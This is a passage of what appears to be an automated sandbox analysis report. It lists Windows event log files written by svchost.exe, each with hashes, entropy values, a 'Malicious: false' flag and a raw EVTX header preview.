SSDEEP:	384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
MD5:	2045FB0D54CA8F456B545859B9F9B0A8
SHA1:	35854F87588C367DE32A3931E01BC71535E3F400
SHA-256:	E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
SHA-512:	013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
Malicious:	false
Preview:	ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8164696340947971
Encrypted:	false
SSDEEP:	384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
MD5:	1AB19FA472669F4334C7A9D44E94E1B3
SHA1:	F71C16706CFA9930045C9A888FDB3EF46CACC5BC
SHA-256:	549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
SHA-512:	72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
Malicious:	false
Preview:	ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9855903635327656
Encrypted:	false
SSDEEP:	384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
MD5:	7BCA54AC75C7185ADFBB42B1A84F86E3
SHA1:	AD91EE55A6F9F77AD871ACA9A5B59987CA679968
SHA-256:	A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
SHA-512:	79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
Malicious:	false
Preview:	ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.165454452307923
Encrypted:	false
SSDEEP:	384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
MD5:	B6B6F199DA64422984403D7374F32528
SHA1:	980D66401DFCCF96ADDDAF22334A5CE735554E7F
SHA-256:	8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
SHA-512:	5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
Malicious:	false
Preview:	ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.8519554794255333
Encrypted:	false
SSDEEP:	384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
MD5:	4140628CA3CEC29C0B506CEEBDF684F6
SHA1:	A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
SHA-256:	1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
SHA-512:	779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
Malicious:	false
Preview:	ElfChnk.\...............\.......................0..../........................................................................v.......................................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............*..8...\........=..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1642919553794224
Encrypted:	false
SSDEEP:	384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
MD5:	D7EECF043241FDB9486580582E208603
SHA1:	045D5672A8E9884B78CD31C52D372375503CBF4F
SHA-256:	6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
SHA-512:	6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
Malicious:	false
Preview:	ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.629091888335578
Encrypted:	false
SSDEEP:	384:8hnMpY6MdYbMdYgMszMJxCMBo9MNaMWdyMFGMzM+MvMbMxMIMZMZMXMBY9M5sMgO:8aY0WrdY2b0
MD5:	8ED8E38A8922BF24C7B2213C8CD1BBE4
SHA1:	93130A0387EA96A3747349038E9445135ACC5590
SHA-256:	BD8ECA7927F142B81F7AA0E6DBDEEBACE95C20156425F4CA8F672005A551C875
SHA-512:	8FC6A57A5A5226AE1DA093F3AE5095AA64137AA94D6179DDD35064D8ACC9E8D1BDF326E37FDBB8FEAD140EE8D451DE8F4F5E2C964C856E5797E59B0347E80103
Malicious:	false
Preview:	ElfChnk.........Q...............Q........... ...X............................................................................Y4.........................................4...=...........................................................................................................................f...............?...........................m...................M...F................................C..........................e...................................................&........H..........................**..0.............=...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1789052367848543
Encrypted:	false
SSDEEP:	384:chL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmxXUm:cY7L0
MD5:	227A6FE8A7FC2231F680B117A28889B7
SHA1:	9AABCBE12A4A99EA2E2C57090A43BEE1E35C5082
SHA-256:	CDCEFE4A04CAD70AA65514EDBC4DFFCAF332F5008576675C3680193EA74D814C
SHA-512:	E128C109CC5C976C937A2669B7412A9C798488D0F15FF618B8AF06F3BDE30CC3D6D2F6CDEDFC582220EC8DC74F5E08EDE9EDBD943A41EF8EED59B562CF383F63
Malicious:	false
Preview:	ElfChnk....................................../..(4.... ......................................................................n.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.2039178074529069
Encrypted:	false
SSDEEP:	48:M8W4mlVrP+MZQNRBEZWTENO4bpBkoZj5B/6FgVt:h8KNVaO80ox5B/6Fg
MD5:	9F137985D488E658A5C0D03D3578EC96
SHA1:	09850197BAA3F87F151D90BA205181AB42E23C2A
SHA-256:	F52C96D28D7F30CAB9B13C6050DDAFA27CD47795C3566B3B570136598C25D2B6
SHA-512:	338F1C0306ED2993F7A540126A5D31A36592A5812514C791981DC2CB66EE55AA1779E70386CC69C7833799B0F577CAC476B982FBA866C9500F2188195C2C47D2
Malicious:	false
Preview:	ElfChnk..............................................E......................................................................w.pp................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............c57...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.6469884746870727
Encrypted:	false
SSDEEP:	384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
MD5:	FC81D9FBA555C6BC7223594B8F6B46DE
SHA1:	971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
SHA-256:	9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
SHA-512:	7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
Malicious:	false
Preview:	ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.4044682693328796
Encrypted:	false
SSDEEP:	768:Q2a0N2aea+aKa+a+ayauaia2aeauaWa2aqaCaqama6a2aKa+a2aeaOaqa+aiaear:9N
MD5:	487388E169D8D8CE97EB18B6044B9963
SHA1:	6EFBC2C7DAD5EA3134295B9A669A507A29F155B1
SHA-256:	F0FBED2023FA45B7AA80CFABCEE81A533345293384F35E1270BD0738CEC05E6A
SHA-512:	CB1CEA3711CB836F9187AC0D60475550A1CFF166853C77F3A4D38D08DECEDA29ED0CFC9F2A3DC9078818837CF3AFD62538E57DE30EE4104EF60BE906981DBE35
Malicious:	false
Preview:	ElfChnk.........@...............@...............`..............................................................................S................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H............eZ...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3132453844344478
Encrypted:	false
SSDEEP:	384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
MD5:	6237EE0458A0478242B975E9BB7AA97D
SHA1:	6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
SHA-256:	C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
SHA-512:	56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
Malicious:	false
Preview:	ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.325262033408211
Encrypted:	false
SSDEEP:	384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
MD5:	D13189B45679E53F5744A4D449F8B00F
SHA1:	ED410CAB42772E329F656B4793B46AC7159CF05B
SHA-256:	BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
SHA-512:	83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
Malicious:	false
Preview:	ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7947046118743749
Encrypted:	false
SSDEEP:	384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
MD5:	55E73A924B170FBFFF862E8E195E839A
SHA1:	3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
SHA-256:	1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
SHA-512:	E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
Malicious:	false
Preview:	ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67960
Entropy (8bit):	4.367594229604636
Encrypted:	false
SSDEEP:	384:aYRVR/RxxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R6:aUxA8nPLGbd
MD5:	71D9442D50A3187868E9C3453134A678
SHA1:	FAB268F4DF7495BFA0CFEF137662BCE3CCA2FEF1
SHA-256:	1D0ED27FD975A49BB10916289D7A4FDFA7BBEAAAA4CAEADE33C09AF6A0A86C1D
SHA-512:	3E77F4A9E9954DB100FF416F0FA6052118B800B7017C7574DAC8BF2621C69EC817D6718D73EB085DD866E6FA4D2B34C93FDF079A91AB33E42E6CAC7E5A2BE370
Malicious:	false
Preview:	ElfChnk.....................................X...@...P........................................................................}......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**................y..3.........x68................................................................<.......T.....!................@..y..3..ZB.,..O.n[.........T........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......Qb......................N...W.M.I.P.r.o.v.......w.m.i.p.r.v.s.e...e.x.e.......%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.b.e.m.\.w.m.i.p

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.273338343434408
Encrypted:	false
SSDEEP:	384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
MD5:	C37372EB51AEDB4552CB839C7294403A
SHA1:	7B7C408D72B084CE36AA6B623AC6B907FD21D569
SHA-256:	C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
SHA-512:	69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
Malicious:	false
Preview:	ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.231195890775603
Encrypted:	false
SSDEEP:	384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
MD5:	3365A34953FD7B16667108A049B64DA5
SHA1:	C72421A58E063D64072152344B266F8306A78702
SHA-256:	AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
SHA-512:	A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
Malicious:	false
Preview:	ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.9632766790588936
Encrypted:	false
SSDEEP:	768:sL5v0NuJKOXvb6mBylNGkVdNWN/3kUbzVVRa6vwVQldASo0RXk9gjdkINbRkmkbu:4hBl
MD5:	1EC62622432296BDBB4697F2503E9F05
SHA1:	574540945FCD5AF534ED0DAB883C06001F09C3B5
SHA-256:	82129BF9EB45DA819F488B0301E22DC27E7E83473A9FE6A735621001FDCC8185
SHA-512:	6FB0D9A6775D236DD2B87B7F301DB21F770734B8AF537D5DC25549B2A7D21C347FC77540FFA2F5D582B121D13EB54F21BC2377F4931955AD0CAF0FD8F711E405
Malicious:	false
Preview:	ElfChnk.........`...............`...............X......Z................................................................................................................B...=...........................................................................................................................f...............?...........................m...................M...F...................................=.......................&...........................................................-...........................**..X...........\|.$2..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.351130285082209
Encrypted:	false
SSDEEP:	384:qh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwS:qOqabeGTnbuSxkjH
MD5:	8C284F8CD09FE44195E554EE59CC57A0
SHA1:	A237A5520973755FC16DE9EEBDC78CCDFDD7945F
SHA-256:	139D69B4C97F88DC488339A4002B1FE1695513B87C31B54C609400099B6BBD2C
SHA-512:	B2AF0534E92795F9A9EF62E2B8F049B97BDE53618682FA17ACE44FEF68D17B522F1F447CF80FA82B9C16152C2599A149C25D9EF6C45DDABF61713CE9D24B2534
Malicious:	false
Preview:	ElfChnk.....................................H...x....u.y.....................................................................u..............................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.421206160086997
Encrypted:	false
SSDEEP:	384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
MD5:	67CAD90771EBC0BD20736201D89C1586
SHA1:	EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
SHA-256:	7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
